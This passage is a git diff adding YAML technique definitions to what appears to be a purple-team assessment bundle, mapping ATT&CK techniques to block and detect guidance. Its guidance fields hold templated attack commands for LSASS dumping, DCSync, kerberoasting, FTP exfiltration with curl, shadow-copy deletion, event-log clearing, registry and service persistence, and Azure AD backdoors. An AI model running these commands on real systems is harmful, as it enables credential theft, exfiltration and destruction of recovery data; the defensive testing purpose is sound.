+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  controls:
+  - Endpoint Protection
+  - Antivirus
+  - SIEM
+  metadata:
+    id: b74ff4c5-eebf-466b-af85-341b19c4c748
+    tid: T1570
+    tactic: TA0008
+    x_vectr_id: b74ff4c5-eebf-466b-af85-341b19c4c748
+    isv: 1
+Exfiltration:
+- name: Extract data to cloud storage service
+  description: Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box
+  platforms:
+  guidance:
+  block:
+  - Sensitive data sent over the network is blocked by network DLP tool
+  - Network security tool detects connection to domain based on category from proxy or DNS
+  detect:
+  - Sensitive data sent over the network is detected by network DLP tool
+  controls:
+  - Firewall
+  - DLP
+  - Web Gateway
+  metadata:
+    id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+    tid: T1567.002
+    tactic: TA0010
+    x_vectr_id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+    isv: 1
+- name: Extract sensitive data over FTP
+  description: Exfiltrate data from the internal network to an external system via FTP
+  platforms:
+  guidance:
+  - https://dlptest.com/ftp-test/
+  - shell> curl --ftp-create-dirs -T {{ local_file }} ftp://{{ username }}:{{ password }}@{{ server }}/{{ dest_path }}
+  block:
+  - Outbound connections over FTP are blocked by network security configurations
+  - Sensitive data sent over the network is blocked by network DLP tool
+  detect:
+  - Sensitive data sent over the network is detected by network DLP tool
+  controls:
+  - DLP
+  - Firewall
+  metadata:
+    id: 11b7a86e-4596-4df9-a2a9-705096756d28
+    tid: T1048.003
+    tactic: TA0010
+    x_vectr_id: 11b7a86e-4596-4df9-a2a9-705096756d28
+    isv: 1
+- name: Extract sensitive data over HTTP
+  description: Extract data from the network over HTTP tcp/80 to an external host or IP.
+  platforms:
+  guidance:
+  - http://dlptest.com/http-post/
+  block:
+  - Sensitive data sent over the network is blocked by network DLP tool
+  detect:
+  - Sensitive data sent over the network is detected by network DLP tool
+  controls:
+  - Firewall
+  - DLP
+  - Web Gateway
+  metadata:
+    id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+    tid: T1048.003
+    tactic: TA0010
+    x_vectr_id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+    isv: 1
+- name: Extract sensitive data over HTTP C2
+  description: Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP
+  platforms:
+  guidance:
+  - implant> download {{ file }}
+  block:
+  - Sensitive data sent over the network is blocked by network DLP tool
+  - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+  detect:
+  - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+  controls:
+  - Firewall
+  - DLP
+  - Web Gateway
+  metadata:
+    id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+    tid: T1041
+    tactic: TA0010
+    x_vectr_id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+    isv: 1
+Impact:
+- name: Encrypt a large amount of files
+  description: Encrypt a large amount of files on the endpoint to simulate ransomware
+  platforms:
+  guidance:
+  - cmd> coldcryptor.exe run {{ extension }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Detect common ransomware extensions using file system telemetry
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+    tid: T1486
+    tactic: TA0040
+    x_tools:
+    - https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+    x_vectr_id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+    isv: 1
+- name: Delete shadows with vssadmin.exe
+  description: Delete volume shadow copies on the host to inhibit file system recovery
+  platforms:
+  - windows
+  guidance:
+  - CMD> vssadmin.exe delete shadows /all /quiet
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Suspicious Volume Shadow Service use detected in the SIEM using telemetry
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+    tid: T1490
+    tactic: TA0040
+    x_vectr_id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+    isv: 1
+- name: Modify group policy object
+  description: Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems.
+  platforms:
+  guidance:
+  block:
+  - ''
+  detect:
+  - Configure auditing on group policy objects then look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+  controls:
+  - SIEM
+  metadata:
+    id: 45591791-541b-4a27-bda9-75e6d78a66f4
+    tid: T1484.001
+    tactic: TA0005
+    x_vectr_id: 45591791-541b-4a27-bda9-75e6d78a66f4
+    isv: 1
+Execution:
+- name: Macro - Remote Template
+  description: Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document
+  platforms:
+  - windows
+  guidance:
+  block:
+  - Macro execution is blocked by GPO policy
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Payload on disk deleted/quarantined by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Payload on disk triggers an alert with endpoint security tool
+  controls:
+  - Endpoint Protection
+  - Hardening
+  - SIEM
+  metadata:
+    id: a7134d71-dc49-41a8-a309-ec520c96a089
+    tid: T1221
+    tactic: TA0005
+    x_vectr_id: a7134d71-dc49-41a8-a309-ec520c96a089
+    isv: 1
+Persistence:
+- name: Persist via new scheduled task
+  description: Persist on a system by creating a new scheduled task
+  platforms:
+  - windows
+  guidance:
+  - cmd> schtasks.exe /create /sc daily /tn {{ task_name }} /tr {{ command }} /st 20:00
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use scheduled task creation events (Event ID 4698) to identify newly created scheduled tasks. Look specifically for events that are anomalous as compared to other task creation events in the environment, such as events where the command is unique across all other tasks and events created by principals that do not commonly create tasks.
+  controls:
+  - SIEM
+  - Endpoint Protection
+  metadata:
+    id: 20a6dace-d801-42f5-b659-6cf91e39d273
+    tid: T1053.005
+    tactic: TA0003
+    x_vectr_id: 20a6dace-d801-42f5-b659-6cf91e39d273
+    isv: 1
+- name: Persist via new Windows service
+  description: Persist on a system by creating a new service
+  platforms:
+  - windows
+  guidance:
+  - CMD> sc create {{ service_name }} binPath= "{{ command }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Use services creation events (Event ID 4697) to identify newly created services. Look specifically for events that are anomalous as compared to other service creation events in the environment, such as events where the command is unique across all other services and events created by principals that do not commonly create services.
+  controls:
+  - SIEM
+  - Endpoint Protection
+  metadata:
+    id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+    tid: T1543.003
+    tactic: TA0003
+    x_vectr_id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+    isv: 1
+- name: Persist via Registry Winlogon Shell
+  description: Run a payload during user login by setting a Registry Winlogon key
+  platforms:
+  - windows
+  guidance:
+  - CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f "{{ command }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+    tid: T1547.004
+    tactic: TA0003
+    x_vectr_id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+    isv: 1
+- name: Persist via Registry "Run" key
+  description: Run a payload during user login and startup by setting a registry run key
+  platforms:
+  - windows
+  guidance:
+  - CMD> reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "{{ key_name }}" /t REG_SZ /F /D "{{ command }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 5dc3f424-8f31-49ee-a822-a77ce20bac43
+    tid: T1547.001
+    tactic: TA0003
+    x_vectr_id: 5dc3f424-8f31-49ee-a822-a77ce20bac43
+    isv: 1
+- name: Persist via new local administrator
+  description: Create a new local user then add them to the "Administrators" group using the builtin net.exe
+  platforms:
+  - windows
+  guidance:
+  - CMD> net user /add {{ username }} {{ password }}
+  - CMD> net localgroup administrators {{ username }} /add
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use group modification events (Event ID 4728) to identify additions to local security groups.
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 0bcb2080-b140-4a1c-9e79-8512a18882d8
+    tid: T1136.001
+    tactic: TA0003
+    x_vectr_id: 0bcb2080-b140-4a1c-9e79-8512a18882d8
+    isv: 1
+- name: Register a new device in Azure AD
+  description: Register a new device in Azure AD
+  platforms:
+  - azuread
+  guidance:
+  - PS> Join-AADIntDeviceToAurzeAD -DeviceName {{ name }} -DeviceType "purple" -OSVersion "1"
+  block:
+  - 'Prevent users outside of approved groups from being able to register new devices in the tenant. Refer to documentation for details: https://learn.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal#configure-device-settings'
+  detect:
+  - Detect anomalous device registration events by using Azure audit logs
+  controls:
+  - SIEM
+  - Hardening
+  metadata:
+    id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+    tid: T1098.005
+    tactic: TA0003
+    x_tools:
+    - AADInternals
+    x_references:
+    - htpts://aadinternals.nom/post/prt/
+    x_vectr_id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+    isv: 1
+- name: Configure a custom federated domain
+  description: Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant.
+  platforms:
+  - azuread
+  guidance:
+  - PS> ConvertTo-AADIntBackdoor -AccessToken {{ access_token }} -DomainName "{{ domain }}"
+  block:
+  - ''
+  detect:
+  - Monitor for unusual domain federation via the SEIM. Examine AAD logs for actions that "Set domain authentication" to "federated".
+  - https://www.inversecos.com/2021/11/how-to-detect-azure-active-directory.html
+  controls:
+  - SIEM
+  metadata:
+    id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+    tid: T1484.002
+    tactic: TA0003
+    x_tools:
+    - AADInternals
+    x_references:
+    - https://o365blog.com/post/aadbackdoor/
+    x_vectr_id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+    isv: 1
+metadata:
+  prefix: HI
+  bundle: Health Index 2024 v1.0
diff --git a/h-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml b/h-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml
new file mode 100644
index 0000000..d274f20
--- /dev/null
+++ b/h-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml
@@ -0,0 +1,19 @@
+name: Screen Capture
+description: Capture an image of the user's screen
+platforms:
+guidance:
+- "implant> {{ screenshot_command }}\nOR \nshell> {{ screenshot_tool }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+metadata:
+  id: 804512cc-4acf-4be3-a577-ce02ea723fab
+  tid: T1113
+  tactic: TA0009
+  x_tools:
+  - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/screenshot.cs
+  x_vectr_id: 804512cc-4acf-4be3-a577-ce02ea723fab
+  isv: 1
diff --git a/h-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml b/h-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml
new file mode 100644
index 0000000..62f850b
--- /dev/null
+++ b/h-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml
@@ -0,0 +1,20 @@
+name: Keylogger
+description: Log user keystrokes
+platforms:
+- windows
+guidance:
+- "implant> {{ keylog_command }}\nOR \nshell> {{ keylog_tool }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+metadata:
+  id: be524cb1-12e6-4708-ad57-faf91dfad9de
+  tid: T1056.001
+  tactic: TA0009
+  x_tools:
+  - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/keylog.cs
+  x_vectr_id: be524cb1-12e6-4708-ad57-faf91dfad9de
+  isv: 1
diff --git a/h-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml b/h-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml
new file mode 100644
index 0000000..250d96d
--- /dev/null
+++ b/h-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml
@@ -0,0 +1,20 @@
+name: Access via remote assistance tool
+description: Establish connection to system using a legitimate remote assistance application
+platforms:
+guidance:
+block:
+- Block the installation and use of unapproved third-party utilities via application control software
+- Connections to known remote access service domains/IPs are blocked
+- Remote access connection attempts originating from users outside of the tenant are blocked
+detect:
+- Connections to known remote access service domains/IPs are detected
+controls:
+- Application Control
+- ID/PS
+- Firewall
+metadata:
+  id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+  tid: T1219
+  tactic: TA0011
+  x_vectr_id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+  isv: 1
diff --git a/h-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml b/h-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml
new file mode 100644
index 0000000..fa200fe
--- /dev/null
+++ b/h-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml
@@ -0,0 +1,18 @@
+name: HTTP C2 over tcp/80
+description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP
+platforms:
+guidance:
+block:
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+  id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+  tid: T1071.001
+  tactic: TA0011
+  x_vectr_id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+  isv: 1
diff --git a/h-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml b/h-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml
new file mode 100644
index 0000000..075c765
--- /dev/null
+++ b/h-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml
@@ -0,0 +1,18 @@
+name: HTTPS C2 over tcp/443
+description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS
+platforms:
+guidance:
+block:
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+  id: 3ed2f449-744b-48c3-80d2-854386e446a0
+  tid: T1071.001
+  tactic: TA0011
+  x_vectr_id: 3ed2f449-744b-48c3-80d2-854386e446a0
+  isv: 1
diff --git a/h-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml b/h-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml
new file mode 100644
index 0000000..ac75a59
--- /dev/null
+++ b/h-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml
@@ -0,0 +1,18 @@
+name: Remote tool download over HTTP
+description: Download a tool from a public hosting location onto the victim system
+platforms:
+guidance:
+block:
+- Signatures for known-malicious tools/traffic are blocked by network security controls such as an ID/PS
+detect:
+- Signatures for known-malicious tools/traffic are detected by network security controls such as an ID/PS
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+  id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+  tid: T1105
+  tactic: TA0011
+  x_vectr_id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+  isv: 1
diff --git a/h-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml b/h-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml
new file mode 100644
index 0000000..12180d9
--- /dev/null
+++ b/h-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml
@@ -0,0 +1,21 @@
+name: Dump LSASS memory using builtin comsvcs.dll
+description: Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk
+platforms:
+- windows
+guidance:
+- shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }}  full
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+controls:
+- SIEM
+- Endpoint Protection
+- Hardening
+metadata:
+  id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+  tid: T1003.001
+  tactic: TA0006
+  x_vectr_id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+  isv: 1
diff --git a/h-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml b/h-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml
new file mode 100644
index 0000000..a27e66e
--- /dev/null
+++ b/h-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml
@@ -0,0 +1,22 @@
+name: Register Security Service Provider (SSP) in LSASS
+description: Register an SSP DLL that into LSASS. This technique can be used by adversaries to harvest credentials that traverse through LSASS.
+platforms:
+- windows
+guidance:
+- shell> {{ ssp_loader }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable the LSA "RunAsPPL" protection to prevent the loading of untrusted DLLs by LSASS
+detect:
+- For SSPs registered permanently, detect modifications to the "Security Packages" key under HKLM\System\CurrentControlSet\Control\LSA\. Additionally look for DLL writes to System32.
+- For temporary SSP loads, detect anomalous module loads by LSASS.exe after establishing a basline for normal module loads
+controls:
+- Endpoint Protection
+metadata:
+  id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+  tid: T1547.005
+  tactic: TA0006
+  x_references:
+  - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package#loading-ssp-without-reboot
+  x_vectr_id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+  isv: 1
diff --git a/h-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml b/h-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml
new file mode 100644
index 0000000..821fcc8
--- /dev/null
+++ b/h-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml
@@ -0,0 +1,25 @@
+name: Dump LSASS memory using Sysinternals ProcDump
+description: Use ProcDump from Sysinternals to dump LSASS process memory
+platforms:
+- windows
+guidance:
+- CMD> procdump -ma lsass.exe dump
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+- Block the installation and use of unapproved third-party utilities via application control software
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+controls:
+- SIEM
+- Endpoint Protection
+- Hardening
+- Application Control
+metadata:
+  id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+  tid: T1003.001
+  tactic: TA0006
+  x_tools:
+  - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+  x_vectr_id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+  isv: 1
diff --git a/h-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml b/h-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml
new file mode 100644
index 0000000..cd0d822
--- /dev/null
+++ b/h-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml
@@ -0,0 +1,20 @@
+name: Extract Logonpasswords via Nanodump
+description: Use nanodump to extract credentials from LSASS process memory
+platforms:
+- windows
+guidance:
+- cmd> nanodump.exe --duplicate -w {{ out_file }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+- Hardening
+metadata:
+  id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+  tid: T1003.001
+  tactic: TA0006
+  x_vectr_id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+  isv: 1
diff --git a/h-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml b/h-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml
new file mode 100644
index 0000000..e5b69b7
--- /dev/null
+++ b/h-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml
@@ -0,0 +1,22 @@
+name: Extract browser cookies
+description: Extract cookie information from the user's browser
+platforms:
+- windows
+guidance:
+- cmd> SharpChrome.exe cookies
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Suspicious access to database files used by browsers detected using file system telemetry in the SIEM
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 95790889-fb7d-42af-a221-3535e4197cde
+  tid: T1555.003
+  tactic: TA0006
+  x_tools:
+  - https://github.com/GhostPack/SharpDPAPI
+  x_vectr_id: 95790889-fb7d-42af-a221-3535e4197cde
+  isv: 1
diff --git a/h-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml b/h-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml
new file mode 100644
index 0000000..642834a
--- /dev/null
+++ b/h-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml
@@ -0,0 +1,19 @@
+name: Enabled WDigest via Registry
+description: Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory
+platforms:
+- windows
+guidance:
+- cmd> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+block:
+- Suspicious Registry modification blocked by endpoint security tool
+detect:
+- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+  tid: T1112
+  tactic: TA0005
+  x_vectr_id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+  isv: 1
diff --git a/h-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml b/h-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml
new file mode 100644
index 0000000..ff73fb9
--- /dev/null
+++ b/h-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml
@@ -0,0 +1,20 @@
+name: Volumetric Kerberoasting
+description: Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set
+platforms:
+guidance:
+- cmd> Rubeus.exe kerberoast
+block:
+- ''
+detect:
+- 'Configure Advanced Audit for Kerberos operations on domain controllers via Group Policy. Using ticket request logs (Event ID 4769), detect suspicious ticket request operations using one or more of the following strategies: 1) Look for a high volume of ticket requests or unique service principals in a short period of time as compared to the typical number of requests by that source. 2) Configure a honey account with a service principal name set then alert when any ticket is requested for that SPN (this requires first configuring a SACL on the account as well as directory service object access auditing via Advanced Audit). 3) Look for downgraded encryption requests where the requested ticket uses RC4 while the target object uses AES (Note: in cases where the account has a weak password, AES tickets can be cracked in a realistic timeframe so attacks may request AES tickets).'
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+  id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+  tid: T1558.003
+  tactic: TA0006
+  x_tools:
+  - https://github.com/GhostPack/Rubeus
+  x_vectr_id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+  isv: 1
diff --git a/h-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml b/h-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml
new file mode 100644
index 0000000..76795bc
--- /dev/null
+++ b/h-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml
@@ -0,0 +1,20 @@
+name: Extract domain user credentials via replication
+description: Replicate a user's hash from a domain controller using replication APIs (DCSync).
+platforms:
+- windows
+guidance:
+- (from workstation) mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ user }}
+block:
+- ''
+detect:
+- Enable object logging for directory services via Group Policy Advanced Audit then alert when non-domin controller sources replicate directory objects. Specifically, look for Event ID 4662 events where the action performed was related to replicating object changes (e.g. either/both of "Replicating Directory Changes all" and "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"/"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}")
+- https://blog.blacklanternsecurity.com/p/detecting-dcsync
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+  id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+  tid: T1003.006
+  tactic: TA0006
+  x_vectr_id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+  isv: 1
diff --git a/h-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml b/h-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml
new file mode 100644
index 0000000..8950dd0
--- /dev/null
+++ b/h-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml
@@ -0,0 +1,22 @@
+name: Clear Windows Event Log entries
+description: Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs.
+platforms:
+- windows
+guidance:
+- CMD> wevtutil clear-log Security
+- CMD> wevtutil clear-log Application
+- CMD> wevtutil clear-log System
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Windows Event Log deletion is detected in the SIEM using Event Log events (Event ID 1102)
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+  tid: T1070.001
+  tactic: TA0005
+  x_vectr_id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+  isv: 1
diff --git a/h-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml b/h-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml
new file mode 100644
index 0000000..1194713
--- /dev/null
+++ b/h-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml
@@ -0,0 +1,20 @@
+name: Sideload a DLL into a legitimate application
+description: Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application.
+platforms:
+- windows
+guidance:
+- "CMD>\ncopy {{ application }} .\nmove {{ dll }} {{ expected_dll }}\n{{ application }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Using image load telemetry, alert on DLLs stored on-disk at unexpected locations (e.g. a DLL expected to be in System32 being loaded from a temp folder)
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 2496e250-5757-482f-9661-daea872395ae
+  tid: T1574.002
+  tactic: TA0005
+  x_vectr_id: 2496e250-5757-482f-9661-daea872395ae
+  isv: 1
diff --git a/h-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml b/h-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml
new file mode 100644
index 0000000..bc14660
--- /dev/null
+++ b/h-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml
@@ -0,0 +1,22 @@
+name: Load known-abusable kernel driver
+description: Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes.
+platforms:
+- windows
+guidance:
